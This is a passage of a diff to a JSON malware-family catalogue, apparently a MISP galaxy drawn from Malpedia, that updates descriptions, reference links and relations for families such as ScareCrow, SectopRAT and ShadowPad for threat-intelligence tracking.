+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf"
],
"synonyms": [],
"type": []
@@ -40849,13 +43053,26 @@
"uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694",
"value": "Scarab Ransomware"
},
+ {
+ "description": "Based on the leaked Conti source code.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7e8e41de-b3f8-4c2b-a9fe-e1aa6532e76b",
+ "value": "ScareCrow"
+ },
{
"description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken",
- "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb",
- "https://github.com/vithakur/schneiken"
+ "https://github.com/vithakur/schneiken",
+ "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb"
],
"synonyms": [],
"type": []
@@ -40868,23 +43085,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
"https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-1ab6c9d2c363",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
"https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine",
"https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "267bf78e-f430-47b6-8ba0-1ae31698c711",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e343583b-8338-42ea-af60-311578146151",
"value": "Scieron"
},
@@ -40906,24 +43114,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos",
- "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf",
- "https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/"
+ "https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5f0f6af2-b644-49a6-8f68-5d4ca58c989e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b5d90140-f307-402c-9d7f-9cdf21a7cb31",
"value": "Scranos"
},
+ {
+ "description": "SentinelOne describes this malware as capable of doing screen capture and keylogging. It is uses by a threat cluster they named WIP19, targeting telecommunications and IT service providers in the Middle East and Asia.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.screencap",
+ "https://www.sentinelone.com/labs/wip19-espionage-new-chinese-apt-targets-it-service-providers-and-telcos-with-signed-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cba2db46-268c-4203-a982-3bf9985c91a4",
+ "value": "ScreenCap"
+ },
{
"description": "",
"meta": {
@@ -40937,33 +43149,48 @@
"uuid": "9803b201-28e5-40c5-b661-c1a191388072",
"value": "ScreenLocker"
},
+ {
+ "description": "ScrubCrypt is the rebranded \"Jlaive\" crypter, with a unique capability of .BAT packing",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scrubcrypter",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/scrubcrypt-the-rebirth-of-jlaive",
+ "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6f597339-7eac-4885-b888-bf8a81bca7b3",
+ "value": "ScrubCrypt"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
+ "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://vblocalhost.com/uploads/VB2020-Jung.pdf",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector",
+ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
"https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://vblocalhost.com/uploads/VB2020-Jung.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
- "https://github.com/Tera0017/SDBbot-Unpacker",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector"
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://github.com/Tera0017/SDBbot-Unpacker",
+ "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader"
],
"synonyms": [],
"type": []
@@ -40972,14 +43199,14 @@
"value": "SDBbot"
},
{
- "description": "",
+ "description": "Backdoor written in Python 2, deployed with PyInstaller.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
"https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/"
],
"synonyms": [
@@ -41001,25 +43228,23 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7429aaf8-85a8-4ae9-b583-c7eec0f5b0cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c",
"value": "SeaSalt"
},
{
- "description": "",
+ "description": "SectopRAT, aka ArechClient2, is a .NET RAT with numerous capabilities including multiple stealth functions. Arechclient2 can profile victim systems, steal information such as browser and crypto-wallet data, and launch a hidden secondary desktop to control browser sessions. Additionally, it has several anti-VM and anti-emulator capabilities.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat",
+ "https://cyberflorida.org/2022/11/arechclient2/",
+ "https://tampabay.tech/2022/11/30/arechclient2/",
+ "https://dr4k0nia.github.io/posts/Analysing-a-sample-of-ArechClient2/",
+ "https://medium.com/@gi7w0rm/a-long-way-to-sectoprat-eb2f0aad6ec8",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
"https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html",
- "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers"
+ "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers",
+ "https://www.gdatasoftware.com/blog/2021/02/36633-new-version-adds-encrypted-communication",
+ "https://cdn-production.blackpointcyber.com/wp-content/uploads/2022/11/01161208/Blackpoint-Cyber-Ratting-out-Arechclient2-Whitepaper.pdf"
],
"synonyms": [
"1xxbot",
@@ -41051,15 +43276,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
"https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf",
- "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
- "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html",
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
],
"synonyms": [
"azzy",
@@ -41075,26 +43300,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed",
- "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/",
- "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
- "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/",
- "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
- "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/",
- "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/",
- "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/",
- "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html",
- "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/",
- "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html",
"https://blog.xpnsec.com/apt28-hospitality-malware-part-2/",
- "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/",
+ "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html",
+ "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
+ "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/",
+ "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/",
+ "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
+ "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf",
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
+ "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html",
+ "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
],
"synonyms": [
"GAMEFISH",
@@ -41126,16 +43351,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet",
- "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
"https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/",
"https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
"https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/"
+ "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html",
+ "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/",
+ "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html"
],
"synonyms": [],
"type": []
@@ -41148,7 +43373,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake",
- "https://twitter.com/8th_grey_owl/status/1481433481485844483"
+ "https://twitter.com/8th_grey_owl/status/1481433481485844483",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
"type": []
@@ -41199,6 +43425,19 @@
"uuid": "6025475a-b89d-401d-882d-50fe1b03154f",
"value": "Sepulcher"
},
+ {
+ "description": "This malware is protected using VMProtect and related to the loading of KEYPLUG.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.serialvlogger",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0592daf4-5f68-4087-ad4e-efe773009ca6",
+ "value": "SerialVlogger"
+ },
{
"description": "",
"meta": {
@@ -41216,30 +43455,30 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper",
- "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware",
- "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
- "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/",
- "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
- "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/",
- "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://insights.oem.avira.com/ta505-apt-group-targets-americas/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners",
- "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/",
- "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
- "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
+ "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/",
+ "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/"
+ "https://prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/",
+ "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/",
+ "https://insights.oem.avira.com/ta505-apt-group-targets-americas/",
+ "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56"
],
"synonyms": [],
"type": []
@@ -41266,8 +43505,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sfile",
"https://twitter.com/GrujaRS/status/1296856836944076802?s=20",
- "https://id-ransomware.blogspot.com/2020/02/sfile2-ransomware.html",
- "https://www.sentinelone.com/blog/from-the-front-lines-another-rebrand-mindware-and-sfile-ransomware-technical-breakdown/"
+ "https://www.sentinelone.com/blog/from-the-front-lines-another-rebrand-mindware-and-sfile-ransomware-technical-breakdown/",
+ "https://id-ransomware.blogspot.com/2020/02/sfile2-ransomware.html"
],
"synonyms": [
"Escal",
@@ -41283,37 +43522,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer",
- "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
- "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/",
- "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/",
- "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/",
- "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
- "https://www.youtube.com/watch?v=T5wPwvLrBYU",
- "https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://blog.reversinglabs.com/blog/forging-the-shadowhammer",
- "https://mauronz.github.io/shadowhammer-backdoor",
- "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/",
- "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://securelist.com/operation-shadowhammer/89992/",
+ "https://mauronz.github.io/shadowhammer-backdoor",
+ "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/",
"https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html",
- "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/"
+ "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
+ "https://www.youtube.com/watch?v=T5wPwvLrBYU",
+ "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
+ "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/",
+ "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/",
+ "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/",
+ "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/"
],
"synonyms": [
"DAYJOB"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c1815516-aa2a-43d2-9136-78a8feb054b6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb",
"value": "shadowhammer"
},
@@ -41322,55 +43552,60 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad",
- "https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://www.welivesecurity.com/2022/09/06/worok-big-picture/",
- "https://www.ic3.gov/Media/News/2021/211220.pdf",
- "https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
- "https://www.youtube.com/watch?v=55kaaMGBARM",
- "https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/",
- "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
- "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/",
- "https://www.youtube.com/watch?v=r1zAVX_HnJg",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf",
- "https://community.riskiq.com/article/d8b749f2",
- "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
- "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
- "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html",
- "https://therecord.media/redecho-group-parks-domains-after-public-exposure/",
- "https://www.secureworks.com/research/shadowpad-malware-analysis",
- "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://securelist.com/shadowpad-in-corporate-networks/81432/",
+ "https://attack.mitre.org/groups/G0096",
